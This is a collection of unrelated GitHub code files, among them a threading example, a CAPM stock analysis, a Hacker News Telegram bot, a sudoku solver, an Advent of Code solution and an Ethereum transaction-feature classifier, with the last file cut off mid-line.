{"seq_id":"37540227045","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Sep 26 16:12:24 2018\r\n\r\n@author: surfcat\r\n\"\"\"\r\n\r\nimport pickle\r\n\r\nf = open('obj/' + 'calibrations_direct_CO_pressure_corrected_4' + '.pkl', 'rb')\r\nmamawebo = pickle.load(f)\r\nf.close()\r\n\r\nprint(mamawebo)","repo_name":"celiacailloux/PhD-Data-Analysis","sub_path":"GC/Old/gastonsucks.py","file_name":"gastonsucks.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
{"seq_id":"33830095651","text":"import threading\nimport logging\n\nlogging.basicConfig(\n    level=logging.DEBUG,\n    format='(%(threadName)-10s) %(message)s'\n)\n\n\n# make subclass of Thread\nclass MyThread(threading.Thread):\n    def __init__(self, group=None, target=None, name=None,\n                 args=(), kwargs=None, *, daemon=None):\n        # redefine constructor with the same signature\n        # but keep the parent class's private args and kwargs easy to access\n        super().__init__(group=group, target=target, name=name,\n                         daemon=daemon)\n        self.args = args\n        self.kwargs = kwargs\n\n    def run(self) -> None:\n        # override run\n        logging.debug('running with {} and {}'.format(self.args, self.kwargs))\n\n\nif __name__ == '__main__':\n    for i in range(3):\n        t = MyThread(args=(i,), kwargs={'a': 'A', 'b': 'B'})\n        
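# start() spawns a new OS thread, which then invokes our run() override\n        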
t.start()\n","repo_name":"JPMike/Starter-Python","sub_path":"StandardLibrary/threading-example/threading_subclass.py","file_name":"threading_subclass.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
{"seq_id":"15194558439","text":"# -*- coding: utf-8 -*-\nimport scrapy\n\n\nclass GithubSpider(scrapy.Spider):\n    name = 'shiyanlou-github'\n\n    @property\n    def start_urls(self):\n        return ('https://github.com/shiyanlou?tab=repositories', )\n\n    def parse(self, response):\n        for repository in response.css('li.public'):\n            yield {\n                'name': repository.xpath('.//a[@itemprop=\"name codeRepository\"]/text()').re_first(r'\\n\\s*(.*)'),\n                'update_time': repository.xpath('.//relative-time/@datetime').extract_first()\n            }\n","repo_name":"shiyanlou/louplus-python","sub_path":"Python 进阶挑战(旧)/10-crawl-github-user-repositories/githubspider.py","file_name":"githubspider.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":182,"dataset":"github-code","pt":"78"}
{"seq_id":"43758877712","text":"import pandas as pd\nimport numpy as np\nimport plotly.express as px\nimport pandas_datareader.data as web\nimport datetime as dt\n\n\n# ++++++++++++++++++++++++++ ( COLLECTING DATA AND BUILDING THE EXCEL FILE ) ++++++++++++++++++++++++++++ #\ndia0 = dt.datetime(2015, 1, 1)\nfim = dt.datetime(2022, 7, 7)\ntickers = ['GGBR4.SA', 'BBDC4.SA', 'EMBR3.SA', 'ENBR3.SA', 'PETR4.SA', 'BOVA11.SA']\ndf = web.DataReader(tickers, 'yahoo', dia0, fim)['Adj Close']\nwriter = pd.ExcelWriter('dados.xlsx', engine='xlsxwriter')\ndf.to_excel(writer, sheet_name='Sheet1')\nwriter.save()\n\n# ++++++++++++++++++++++++++ ( CREATING TABLES WITH THE DATA ORGANIZED AS DESIRED ) +++++++++++++++++++++++++++ #\ndataset = pd.read_excel('dados.xlsx', sheet_name='Sheet1')\n\ndataset.drop(labels=['Date'], axis=1, inplace=True)\ndataset_normalizado = dataset.copy()\nfor i in dataset.columns:\n    dataset_normalizado[i] = dataset[i] / dataset[i][0]\nprint('Normalized data:', dataset_normalizado)\n\ndataset_taxa_retorno = (dataset_normalizado / dataset_normalizado.shift(1)) - 1\nprint('Return rate: ', dataset_taxa_retorno)\n\ndataset_taxa_retorno.fillna(0, inplace=True)\nprint('Return rates:', dataset_taxa_retorno.head())\n\nprint('Annual return rate:')\nprint(dataset_taxa_retorno.mean() * 246)\n\n# ++++++++++++++++++++++++++ ( BETA via LINEAR REGRESSION ) ++++++++++++++++++++++++++++ #\nfigura = px.scatter(dataset_taxa_retorno, x='BOVA11.SA', y='BBDC4.SA', title='BOVA x BBDC')\nfigura.show()\n\nbeta, alpha = np.polyfit(x=dataset_taxa_retorno['BOVA11.SA'], y=dataset_taxa_retorno['BBDC4.SA'], deg=1)\n\nprint('beta:', beta, 'alpha:', alpha, 'alpha (%):', alpha * 100)\n\nfigura = px.scatter(dataset_taxa_retorno, x='BOVA11.SA', y='BBDC4.SA', title='BOVA11.SA x BBDC4.SA')\nfigura.add_scatter(x=dataset_taxa_retorno['BOVA11.SA'], y=beta * dataset_taxa_retorno['BOVA11.SA'] + alpha)\nfigura.show()\n\n# ++++++++++++++++++++++++++ ( BETA via COVARIANCE ) ++++++++++++++++++++++++++++ #\n# DROP THE ASSETS WE DO NOT WANT TO ANALYZE\nmatriz_covariancia = dataset_taxa_retorno.drop(columns=['GGBR4.SA', 'EMBR3.SA', 'ENBR3.SA', 'PETR4.SA']).cov() * 246\nprint(matriz_covariancia)\n\ncov_bbdc_bova = matriz_covariancia.iloc[1, 0]\nprint('Covariance BOVA x BBDC:', cov_bbdc_bova)\n\nvariancia_bova = dataset_taxa_retorno['BOVA11.SA'].var() * 246\nprint('Variance BOVA:', variancia_bova)\n\nbeta_bbdc = cov_bbdc_bova / variancia_bova\nprint('BETA 
BBDC: ', beta_bbdc)\n# ++++++++++++++++++++++++++ ( CAPM FOR A SINGLE ASSET ) ++++++++++++++++++++++++++++ #\n\nrm = dataset_taxa_retorno['BOVA11.SA'].mean() * 246\nprint('++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++')\nprint(rm)\n\ntaxa_selic_historico = np.array([12.75, 14.25, 12.25, 6.5, 5.0, 2.0, 9.15])\nrf = taxa_selic_historico.mean() / 100\nprint('++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++')\nprint(rf)\n\ncapm_bbdc = rf + (beta * (rm - rf))\nprint('CAPM of BBDC4: ', capm_bbdc)\n\n# ++++++++++++++++++++++++++ ( BETA FOR ALL ASSETS ) ++++++++++++++++++++++++++++ #\n\nbetas = []\nalphas = []\n\nprint('++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++')\nfor ativo in dataset_taxa_retorno.columns[0:-1]:\n\n    beta, alpha = np.polyfit(dataset_taxa_retorno['BOVA11.SA'], dataset_taxa_retorno[ativo], 1)\n    betas.append(beta)\n    alphas.append(alpha)\n\n\ndef visualiza_betas_alphas(betas, alphas):\n    for i, ativo in enumerate(dataset_taxa_retorno.columns[0:-1]):\n        print(ativo, 'beta:', betas[i], 'alpha:', alphas[i] * 100)\n\n\nvisualiza_betas_alphas(betas, alphas)\nprint('++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++')\nprint('Average alpha: ', np.array(alphas).mean() * 100)\n\n# ++++++++++++++++++++++++++ ( CAPM FOR THE PORTFOLIO ) ++++++++++++++++++++++++++++ #\ncapm_empresas = []\nfor i, ativo in enumerate(dataset_taxa_retorno.columns[0:-1]):\n\n    capm_empresas.append(rf + (betas[i] * (rm - rf)))\n\n\ndef visualiza_capm(capm):\n    for c, ativo in enumerate(dataset_taxa_retorno.columns[0:-1]):\n        print(ativo, 'CAPM:', capm[c] * 100)\n\n\nvisualiza_capm(capm_empresas)\n# DEFINE THE PORTFOLIO WEIGHTS BELOW\npesos = np.array([0.2, 0.2, 0.2, 0.2, 0.2])\n\ncapm_portfolio = np.sum(capm_empresas * pesos) * 100\nprint('++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++')\nprint('CAPM of the portfolio: ', capm_portfolio)\n","repo_name":"LeoLomardo/PythonMercadoFinanceiro","sub_path":"RegreLinear.py","file_name":"RegreLinear.py","file_ext":"py","file_size_in_byte":4394,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"}
{"seq_id":"71986071611","text":"# coding: utf-8\n\nimport datetime\nimport logging\n\nimport timeago\nfrom sqlalchemy import Column, DateTime, Integer, String, Text, create_engine\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import Session\n\nfrom .telegram import TelegramBot\n\nFOUR_HOURS = datetime.timedelta(hours=4)\nTWO_DAYS = datetime.timedelta(days=2)\n\n\nBase = declarative_base()\n\n\nclass StoryPost(Base):\n    __tablename__ = \"story_post\"\n\n    id = Column(String, primary_key=True)  # Assuming 'id' is a string\n    title = Column(String)\n    text = Column(Text)\n    message = Column(Text)\n    url = Column(Text)\n    story_url = Column(Text)\n    hn_url = Column(Text)\n    score = Column(Integer)\n    telegram_message_id = Column(Integer)\n    created = Column(DateTime, default=datetime.datetime.utcnow)\n\n\nclass StoryHandler:\n    def __init__(self, database_uri: str, telegram_bot: TelegramBot) -> None:\n        self.engine = create_engine(database_uri)\n        Base.metadata.create_all(self.engine)\n        self.telegram_bot = telegram_bot\n\n    def add_story(self, story):\n        with Session(self.engine) as session:\n            story_id_int = story.get(\"id\")\n            story_id = str(story_id_int)\n            hn_url = \"https://news.ycombinator.com/item?id={}\".format(story_id)\n            
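# note: text posts like Ask HN have no external URL; that case is handled below\n            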
story_url = story.get(\"url\")\n\n            post = session.query(StoryPost).get(story_id)\n            if post:\n                logging.info(f\"STOP: {story_id} in DB\")\n                return\n            logging.info(\"SEND: {}\".format(story_id))\n\n            story[\"title\"] = story.get(\"title\")\n            comments_count = story.get(\"descendants\", 0)\n            buttons = []\n\n            if story_url:\n                buttons.append({\"text\": \"Read\", \"url\": story_url})\n            story[\"url\"] = hn_url\n\n            buttons.append(\n                {\"text\": \"{}+ Comments\".format(comments_count), \"url\": hn_url}\n            )\n\n            now = datetime.datetime.now()\n            published = datetime.datetime.fromtimestamp(story.get(\"time\"))\n            ago = timeago.format(now, published)\n\n            # Add 🔥 emoji if story is hot and gained the required score in less than 4 hours,\n            # or add ❄️ if it took it more than 2 days\n            status_emoji = \"\"\n            delta = now - published\n            if delta <= FOUR_HOURS:\n                status_emoji = \"🔥 \"\n            elif delta >= TWO_DAYS:\n                status_emoji = \"❄️ \"\n\n            # Add title\n            message = (\n                \"{title} ({status_emoji}Score: {score}+ {ago})\\n\\n\"\n                .format(ago=ago, status_emoji=status_emoji, **story)\n            )\n\n            # Add link\n            message += \"Link: {}\\n\".format(story_url)\n\n            # Add comments link (don't add it for `Ask HN`, etc.)\n            if story_url:\n                message += \"Comments: {}\\n\".format(hn_url)\n\n            # Add text\n            text = story.get(\"text\")\n            if text:\n                text = (\n                    text.replace(\"<p>\", \"\\n\")\n                    .replace(\"&#x27;\", \"'\")\n                    .replace(\"&#x2F;\", \"/\")\n                )\n                message += \"\\n{}\\n\".format(text)\n\n            # Send to the telegram channel\n            result = self.telegram_bot.send_message(\n                message, {\"inline_keyboard\": [buttons]}\n            )\n\n            logging.info(\"Telegram response: {}\".format(result))\n\n            telegram_message_id = None\n            if result and result.get(\"ok\"):\n                telegram_message_id = result.get(\"result\").get(\"message_id\")\n            print(\"{id} pushed to channel ({score})\".format(**story))\n            new_story = StoryPost(\n                id=story_id,\n                title=story.get(\"title\"),\n                url=story_url,\n                score=story.get(\"score\"),\n                text=story.get(\"text\"),\n                story_url=story_url,\n                hn_url=hn_url,\n                message=message,\n                telegram_message_id=telegram_message_id,\n            )\n            session.add(new_story)\n            session.commit()\n","repo_name":"davuses/HackerNewsHotBot","sub_path":"hackernews_hot/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":4126,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"}
{"seq_id":"18646721655","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n#sudoku solver\nfrom pprint import pprint\n\ndef find_next_empty(puzzle):\n    #any open spaces will be marked as -1\n    #this function will find the empty spaces for us\n    for r in range(9):\n        for c in range(9):\n            if puzzle[r][c] == -1:\n                return r,c\n    \n    return None, None # if no spaces in the puzzle are left\n\n############################################################\n# SOLVER IMPLEMENTATION\n############################################################\n\ndef is_valid(puzzle, guess, row, col):\n    #figures out if the guess is valid or not\n    #returns True if valid and False otherwise\n    row_vals = puzzle[row]\n    if guess in row_vals:\n        return False\n    #now the cols\n    col_vals = []\n    for i in range(9):\n        col_vals.append(puzzle[i][col])\n    if guess in col_vals:\n        return False\n    #and then the 3x3 squares\n    #we need to know where the 3x3 square starts, then iterate over the 3 values in the rows/cols\n    row_start = (row // 3)*3\n    col_start = (col // 3)*3 \n    for r in range(row_start, row_start + 3):\n        for c in range(col_start, col_start + 3):\n            if puzzle[r][c] == guess:\n                return False\n    #if we get here then it is valid\n    return True\n\n    \n\ndef solve_sudoku(puzzle):\n    row, col = find_next_empty(puzzle)\n    # now we implement some validation checks\n    if row is None:\n        return True\n    for guess in range(1, 10):\n        #check if this is a valid guess\n        if is_valid(puzzle, guess, row, col):\n            # if the value is valid then we want to place the guess on the puzzle\n            puzzle[row][col] = guess\n            # recursively call our function\n            if solve_sudoku(puzzle):\n                return True\n        #what if our guess doesn't solve the puzzle? 
We must backtrack and try again\n puzzle[row][col] = -1 #resets the guess\n \n #if every combination is tried and still not solved than this puzzle is unsolvable\n return False\n\nif __name__ == '__main__':\n example_board = [\n [3, 9, -1, -1, 5, -1, -1, -1, -1],\n [-1, -1, -1, 2, -1, -1, -1, -1, 5],\n [-1, -1, -1, 7, 1, 9, -1, 8, -1],\n\n [-1, 5, -1, -1, 6, 8, -1, -1, -1],\n [2, -1, 6, -1, -1, 3, -1, -1, -1],\n [-1, -1, -1, -1, -1, -1, -1, -1, 4],\n\n [5, -1, -1, -1, -1, -1, -1, -1, -1],\n [6, 7, -1, 1, -1, 5, -1, 4, -1],\n [1, -1, 9, -1, -1, -1, 2, -1, -1]\n ]\n print(solve_sudoku(example_board))\n pprint(example_board)\n \n \n\n","repo_name":"BurhanK2003/Sudoku-Solver","sub_path":"Sudoku Solver.py","file_name":"Sudoku Solver.py","file_ext":"py","file_size_in_byte":2605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"26799011103","text":"import collections\r\nfrom collections import defaultdict, Counter\r\nimport functools\r\nimport itertools\r\nfrom itertools import product, permutations, combinations\r\nimport bisect\r\nimport math\r\nfrom rich import print\r\nimport parse\r\nimport operator\r\nfrom heapq import heappop, heappush\r\n\r\n\r\ndef read_data(file_name):\r\n with open(file_name + \".txt\", \"r\", newline=None) as data:\r\n data = data.read().splitlines()\r\n return data\r\n\r\n\r\ndef parser(data):\r\n pattern = \"target area: x={x1:d}..{x2:d}, y={y2:d}..{y1:d}\"\r\n match = parse.search(pattern, data)\r\n return match.named\r\n\r\n\r\ndef part_test():\r\n data = read_data(\"test\")\r\n assert part_1(data) == 45\r\n assert part_2(data) == 112\r\n\r\n\r\ndef fox(y, y1, y2):\r\n yy = 0\r\n mx = 0\r\n steps = []\r\n i = 0\r\n while yy >= y2:\r\n i += 1\r\n yy += y\r\n y -= 1\r\n mx = max(yy, mx)\r\n if yy <= y1 and yy >= y2:\r\n steps.append(i)\r\n return steps\r\n\r\n\r\ndef foox(x, x1, x2):\r\n xx = 0\r\n steps = []\r\n i = 0\r\n while x:\r\n i += 1\r\n xx += x\r\n if x:\r\n x += 1 if x < 0 else -1\r\n if xx >= x1 and xx <= x2:\r\n steps.append(i)\r\n if not x and xx >= x1 and xx <= x2:\r\n for i in range(max(steps), max(steps) + 500):\r\n steps.append(i)\r\n return steps\r\n\r\n\r\ndef part_1(datat):\r\n data = datat[:][0]\r\n data = parser(data)\r\n return (data[\"y2\"] + 1) * data[\"y2\"] // 2\r\n\r\n\r\ndef part_2(datat):\r\n data = datat[:][0]\r\n data = parser(data)\r\n d = defaultdict(set)\r\n dx = defaultdict(int)\r\n s = set()\r\n for i in range(max(data[\"x2\"] * 2, data[\"y1\"] * 2)):\r\n r = foox(i, data[\"x1\"], data[\"x2\"])\r\n for k in r:\r\n s.add(k)\r\n d[k].add(i)\r\n dx[k] += 1\r\n\r\n dy = defaultdict(set)\r\n dyy = defaultdict(int)\r\n sy = set()\r\n for i in range(-100, 100):\r\n r = fox(\r\n i,\r\n data[\"y1\"],\r\n data[\"y2\"],\r\n )\r\n for k in r:\r\n sy.add(k)\r\n dy[k].add(i)\r\n dyy[k] += 1\r\n\r\n inter = s.intersection(sy)\r\n r = 0\r\n rs = set()\r\n for i in inter:\r\n per = itertools.product(d[i], dy[i])\r\n for j in per:\r\n rs.add(j)\r\n\r\n return len(rs)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n part_test()\r\n data = read_data(\"input\")\r\n print(part_1(data))\r\n print(part_2(data))\r\n","repo_name":"Cvaniak/AdventOfCode","sub_path":"2021/Day17/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2407,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"9245203740","text":"# pip3 install pandas numpy ast pycaret=2.3.3 tune-sklearn ray[tune] scikit-optimize\r\n\r\nimport pandas as pd\r\nimport numpy 
as np\r\nimport ast\r\nimport pycaret\r\nfrom pycaret.classification import *\r\nfrom pycaret.regression import *\r\n\r\ncontractDict = {\r\n \"0x1f9840a85d5af5bf1d1762f925bdaddc4201f984\": \"Uniswap: Uniswap Protocol: UNI Token\",\r\n \"0x7a250d5630b4cf539739df2c5dacb4c659f2488d\": \"Uniswap: Uniswap V2: Router 2\",\r\n \"0x090d4613473dee047c3f2706764f49e0821d256e\": \"Uniswap: Uniswap: Token Distributor\",\r\n \"0xc2edad668740f1aa35e4d8f227fb8e17dca888cd\": \"SushiSwap: SushiSwap: MasterChef LP Staking Pool\",\r\n \"0xd9e1ce17f2641f24ae83637ab66a2cca9c378b9f\": \"SushiSwap: SushiSwap: Router\",\r\n \"0x6b3595068778dd592e39a122f4f5a5cf09c90fe2\": \"SushiSwap: SushiSwap: SUSHI Token\",\r\n \"0x088ee5007c98a9677165d78dd2109ae4a3d04d0c\": \"SushiSwap: SushiSwap: YFI\",\r\n \"0x3e66b66fd1d0b02fda6c811da9e0547970db2f21\": \"Balancer: Balancer: Exchange Proxy 2\",\r\n \"0xba100000625a3754423978a60c9317c58a424e3d\": \"Balancer: Balancer: BAL Token\",\r\n \"0x9008D19f58AAbD9eD0D60971565AA8510560ab41\": \"CowSwap: Settlement Contract\",\r\n \"0x3328f5f2cEcAF00a2443082B657CedEAf70bfAEf\": \"CowSwap: OLD Settlement Contract\",\r\n \"0xe41d2489571d322189246dafa5ebde1f4699f498\": \"ZRX: ZRX Token\",\r\n \"0xd26114cd6EE289AccF82350c8d8487fedB8A0C07\": \"OMG Network: OMG Token\",\r\n \"0x111111111117dc0aa78b770fa6a738034120c302\": \"1INCH: 1INCH Token\",\r\n \"0x3A8cCCB969a61532d1E6005e2CE12C200caeCe87\": \"TitanSwap: Titan Token\",\r\n \"0x6c28AeF8977c9B773996d0e8376d2EE379446F2f\": \"Quickswap: QUICK Token\",\r\n \"0xdd974d5c2e2928dea5f71b9825b8b646686bd200\": \"Kyber: Old KNC Token\",\r\n \"0x9aab3f75489902f3a48495025729a0af77d4b11e\": \"Kyber: Kyber Proxy 2\",\r\n \"0xecf0bdb7b3f349abfd68c3563678124c5e8aaea3\": \"Kyber: Kyber Staking\",\r\n \"0xdeFA4e8a7bcBA345F687a2f1456F5Edd9CE97202\": \"Kyber: Kyber Network Crystal v2\",\r\n \"0xbbbbca6a901c926f240b89eacb641d8aec7aeafd\": \"Loopring: LRC Token\",\r\n \"0x0baba1ad5be3a5c0a66e7ac838a129bf948f1ea4\": \"Loopring: Exchange V2\",\r\n \"0xf4662bb1c4831fd411a95b8050b3a5998d8a4a5b\": \"Loopring: Staking Pool\",\r\n \"0x7fc66500c84a76ad7e9c93437bfc5ac33e2ddae9\": \"Aave: AAVE Token\",\r\n \"0x7d2768de32b0b80b7a3454c06bdac94a69ddc7a9\": \"Aave: Aave: Lending Pool V2\",\r\n \"0xdcd33426ba191383f1c9b431a342498fdac73488\": \"Aave: WETH Gateway\",\r\n \"0x030ba81f1c18d280636f32af80b9aad02cf0854e\": \"Aave: aWETH Token\",\r\n \"0xbcca60bb61934080951369a648fb03df4f96263c\": \"Aave: aUSDC Token\",\r\n \"0x028171bca77440897b824ca71d1c56cac55b68a3\": \"Aave: aDAI Token\",\r\n \"0x3d9819210a31b4961b30ef54be2aed79b9c9cd3b\": \"Compound: Compcontroller\",\r\n \"0xc00e94cb662c3520282e6f5717214004a7f26888\": \"Compound: COMP Token\",\r\n \"0x6b175474e89094c44da98b954eedeac495271d0f\": \"Maker: Dai Stablecoin\",\r\n \"0x9f8f72aa9304c8b593d555f12ef6589cc3a579a2\": \"Maker: Maker Token\",\r\n \"0x4c19596f5aaff459fa38b0f7ed92f11ae6543784\": \"TrueFi: TrueFi Token\",\r\n \"0x2ba592f78db6436527729929aaf6c908497cb200\": \"CREAM Finance: CREAM Token\",\r\n \"0x3d5bc3c8d13dcb8bf317092d84783c2697ae9258\": \"CREAM Finance: Comptroller\",\r\n \"0xc011a73ee8576fb46f5e1c5751ca3b9fe0af2a6f\": \"Synthetix: SNX Token\",\r\n \"0xb440dd674e1243644791a4adfe3a2abb0a92d309\": \"Synthetix: Fee Pool\",\r\n \"0xd7c49cee7e9188cca6ad8ff264c1da2e69d4cf3b\": \"Nexus Mutual: NXM Token\",\r\n \"0x84edffa16bb0b9ab1163abb0a13ff0744c11272f\": \"Nexus Mutual: Pooled Staking\",\r\n \"0x1e0447b19bb6ecfdae1e4ae1694b0c3659614e4e\": \"dYdX: Solo Margin\",\r\n \"0xa8b39829ce2246f89b31c013b8cde15506fb9a76\": 
\"dYdX: Pay Proxy for Solo Margin\",\r\n \"0xd54f502e184b6b739d7d27a6410a67dc462d69c8\": \"dYdX: L2 Perp Smart Contract\",\r\n \"0x09403fd14510f8196f7879ef514827cd76960b5d\": \"dYdX: Perp Proxy\",\r\n \"0x8129b737912e17212c8693b781928f5d0303390a\": \"dYdX: L2 On-Chain Operator\",\r\n \"0x39246c4f3f6592c974ebc44f80ba6dc69b817c71\": \"Opyn: Options Exchange\",\r\n \"0xcc5d905b9c2c8c9329eb4e25dc086369d6c7777c\": \"Opyn: Options Factory\",\r\n \"0x6123b0049f904d730db3c36a31167d9d4121fa6b\": \"Ribbon Finance: RBN Token\",\r\n \"0x722122df12d4e14e13ac3b6895a86e84145b6967\": \"Tornado Cash: Tornado Cash Proxy\",\r\n \"0x77777feddddffc19ff86db637967013e6c6a116c\": \"Tornado Cash: TORN Token\",\r\n \"0x746aebc06d2ae31b71ac51429a19d54e797878e9\": \"Tornado Cash: Mining v2\",\r\n \"0xa160cdab225685da1d56aa342ad8841c3b53f291\": \"Tornado Cash: 100 ETH\",\r\n \"0x910cbd523d972eb0a6f4cae4618ad62622b39dbf\": \"Tornado Cash: 10 ETH\",\r\n \"0x47ce0c6ed5b0ce3d3a51fdb1c52dc66a7c3c2936\": \"Tornado Cash: 1 ETH\",\r\n \"0x12d66f87a04a9e220743712ce6d9bb1b5616b8fc\": \"Tornado Cash: 0.1 ETH\",\r\n \"0x4a57e687b9126435a9b19e4a802113e266adebde\": \"Flexa: FXC Token\",\r\n \"0xa0b86991c6218b36c1d19d4a2e9eb0ce3606eb48\": \"USDC: USDC Token\",\r\n \"0xdac17f958d2ee523a2206206994597c13d831ec7\": \"USDT: USDT Token\",\r\n \"0x4fabb145d64652a948d72533023f6e7a623c7c53\": \"BUSD: Binance USD\",\r\n \"0xa47c8bf37f92abed4a126bda807a7b7498661acd\": \"WUSDT: Wrapped USDT\",\r\n \"0xc02aaa39b223fe8d0a0e5c4f27ead9083c756cc2\": \"WETH: Wrapped ETH\"\r\n}\r\n\r\ndef generate_features(dataset):\r\n features = []\r\n callData = []\r\n for index, row in dataset[['txData', 'txTrace']].iterrows():\r\n txData = ast.literal_eval(row['txData'])\r\n txTrace = ast.literal_eval(row['txTrace'])\r\n callData.append(aggregateCallData(txTrace))\r\n\r\n features.append([\r\n int(txData['from'], 0) % (2 ** 30),\r\n (int(txData['to'], 0) if txData['to'] is not None else 0) % (2 ** 30),\r\n int(txData['gas'], 0),\r\n int(txData['gasPrice'], 0) / (10 ** 9),\r\n (int(txData['input'][:10], 0) if txData['input'] != '0x' else 0) % (2 ** 30),\r\n (int(len(txData['input'][10:])) / 32 if txData['input'] != '0x' else 0),\r\n int(txData['nonce'], 0),\r\n int(txData['value'], 0) / (10 ** 18),\r\n\r\n int(txTrace['gas'], 0),\r\n (int(len(txTrace['output'])) - 2 if 'output' in txTrace.keys() else 0),\r\n (int(txTrace['gasUsed'], 0) if 'gasUsed' in txTrace.keys() else 0)\r\n ])\r\n\r\n mainFeatures = pd.DataFrame(np.array(features), columns=['from', 'to', 'gasLimit', 'gasPrice', 'inputMethod',\r\n 'inputSize', 'nonce', 'value', 'txTraceGas', 'outputSize',\r\n 'gasUsed'])\r\n callFeatureNames = ['totalCalls', 'nCALL', 'nSTATICCALL', 'nDELEGATECALL', 'nCREATE',\r\n 'nSELFDESTRUCT', 'totalValue', 'totalInputSize', 'totalOutputSize',\r\n 'callsGasUsed', 'nErrors', 'errExecRev', 'errOutOfGas', 'errBadInst',\r\n 'errBadJumpDest'] + list(contractDict.values())\r\n callFeatures = pd.DataFrame(np.array(callData), columns=callFeatureNames)\r\n\r\n return pd.concat([mainFeatures, callFeatures], axis=1)\r\n\r\ndef aggregateCallData(trace):\r\n callData = {\r\n 'totalCalls': 0,\r\n 'nCALL': 0,\r\n 'nSTATICCALL': 0,\r\n 'nDELEGATECALL': 0,\r\n 'nCREATE': 0,\r\n 'nSELFDESTRUCT': 0,\r\n 'totalValue': 0,\r\n 'totalInputSize': 0,\r\n 'totalOutputSize': 0,\r\n 'callsGasUsed': 0,\r\n 'nErrors': 0,\r\n 'errExecRev': 0,\r\n 'errOutOfGas': 0,\r\n 'errBadInst': 0,\r\n 'errBadJumpDest': 0\r\n }\r\n contract_count = dict.fromkeys(list(contractDict.keys()), 0)\r\n\r\n def 
recurseCalls(trace):\r\n if 'calls' in trace.keys():\r\n for intTrace in trace['calls']:\r\n recurseCalls(intTrace)\r\n\r\n callData['totalCalls'] += 1\r\n if trace['type'] == 'CALL':\r\n callData['nCALL'] += 1\r\n elif trace['type'] == 'STATICCALL':\r\n callData['nSTATICCALL'] += 1\r\n elif trace['type'] == 'DELEGATECALL':\r\n callData['nDELEGATECALL'] += 1\r\n elif trace['type'] == 'CREATE':\r\n callData['nCREATE'] += 1\r\n elif trace['type'] == 'SELFDESTRUCT':\r\n callData['nSELFDESTRUCT'] += 1\r\n\r\n callData['totalValue'] += (int(trace['value'], 0) / (10 ** 18) if 'value' in trace.keys() else 0)\r\n callData['totalInputSize'] += (int(len(trace['input'])) - 2 if 'input' in trace.keys() else 0)\r\n callData['totalOutputSize'] += (int(len(trace['output'])) - 2 if 'output' in trace.keys() else 0)\r\n callData['callsGasUsed'] += (int(trace['gasUsed'], 0) if 'gasUsed' in trace.keys() else 0)\r\n\r\n if 'error' in trace.keys():\r\n callData['nErrors'] += 1\r\n if trace['error'] == 'execution reverted':\r\n callData['errExecRev'] += 1\r\n elif trace['error'] == 'Out of gas':\r\n callData['errOutOfGas'] += 1\r\n elif trace['error'] == 'Bad instruction':\r\n callData['errBadInst'] += 1\r\n elif trace['error'] == 'Bad jump destination':\r\n callData['errBadJumpDest'] += 1\r\n\r\n if 'to' in trace.keys():\r\n if trace['to'] in contract_count:\r\n contract_count[trace['to']] += 1\r\n\r\n recurseCalls(trace)\r\n return list(callData.values()) + list(contract_count.values())\r\n\r\ndef predictClassification():\r\n #### DATA LOAD ####\r\n train = pd.read_csv('train.csv')\r\n train_features = generate_features(train)\r\n test = pd.read_csv('test.csv')\r\n test_features = generate_features(test)\r\n\r\n #### CLASSIFICATION ####\r\n data = pd.concat([train_features, train['Label0']], axis=1)\r\n grid = pycaret.classification.setup(data=data,\r\n target='Label0',\r\n normalize=True,\r\n normalize_method='minmax',\r\n fold_shuffle=True,\r\n remove_outliers=True,\r\n feature_selection=True,\r\n fix_imbalance=True,\r\n fold=10,\r\n html=False,\r\n silent=True)\r\n\r\n top5 = pycaret.classification.compare_models(n_select=5, sort='AUC')\r\n tuned_top5 = [pycaret.classification.tune_model(i,\r\n optimize='AUC',\r\n n_iter=10,\r\n search_library='tune-sklearn',\r\n search_algorithm='bayesian',\r\n early_stopping=True,\r\n choose_better=True) for i in top5]\r\n bagged_top5 = [pycaret.classification.ensemble_model(i, optimize='AUC') for i in tuned_top5]\r\n blender = pycaret.classification.blend_models(estimator_list=top5, optimize='AUC', method='soft')\r\n best_classification_model = pycaret.classification.automl(optimize='AUC')\r\n classificationPredictions = pycaret.classification.predict_model(best_classification_model, data=test_features, raw_score=True)['Score_True']\r\n return classificationPredictions\r\n\r\ndef predictRegression():\r\n #### DATA LOAD ####\r\n train = pd.read_csv('train.csv')\r\n train_features = generate_features(train)\r\n test = pd.read_csv('test.csv')\r\n test_features = generate_features(test)\r\n\r\n #### REGRESSION ####\r\n data = pd.concat([train_features, train[['Label0', 'Label1']]], axis=1)\r\n data = data[data['Label0'] == True]\r\n data = data.drop(columns=['Label0'])\r\n grid = pycaret.regression.setup(data=data,\r\n target='Label1',\r\n normalize=True,\r\n normalize_method='minmax',\r\n fold_shuffle=True,\r\n remove_outliers=True,\r\n feature_selection=True,\r\n feature_selection_method='boruta',\r\n fold=10,\r\n html=False,\r\n silent=True)\r\n\r\n top5 = 
